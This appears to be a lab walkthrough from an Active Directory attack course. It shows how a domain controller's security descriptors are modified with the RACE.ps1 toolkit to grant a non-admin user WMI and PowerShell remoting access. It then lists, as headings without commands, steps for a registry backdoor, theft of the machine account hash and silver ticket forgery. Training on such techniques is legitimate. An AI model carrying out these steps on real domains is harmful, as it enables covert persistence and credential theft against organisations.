Obj 13 Security Descriptors

Task - Modify security descriptors on dcorp-dc to get access using PowerShell remoting and WMI without requiring administrator access. Retrieve machine account hash from dcorp-dc with silver ticket.

Start a new session, run invishell, and load race.ps1

. C:\AD\Tools\RACE.ps1
Set-RemoteWMI -SamAccountNamestudentx-ComputerName dcorp-dc.dollarcorp.moneycorp.local -namespace 'root\cimv2' -Verbosee

Now, we can execute WMI queries on the DC as studentx:

PS C:\AD\Tools> gwmi -class win32_operatingsystem -ComputerName dcorp-dc.dollarcorp.moneycorp.local

Enable PSSRemoting on the DC from the student vm

Set-RemotePSRemoting –SamAccountNamestudentx-ComputerName dcorp-dc.dollarcorp.moneycorp.local -Verbose

We can now run commands using PowerShell remoting on the DC without DA privileges:

Invoke-Command -ScriptBlock{whoami} -ComputerName dcorp-dc.dollarcorp.moneycorp.local

Retrieve machine account hash without DA

we first need to modify permissions on the DC to allow this. Start a new session as DA and load the race.ps1 script shown above.

Add RemoteBackDoor to DC

Now we can retrieve the machine hash to use later

Create a Silver Ticket as HOST on the DC

Create a Silver Ticket as RPCSS on the DC

Check to make sure the tickets were made

Now we can run WMI queries on the DC

Last updated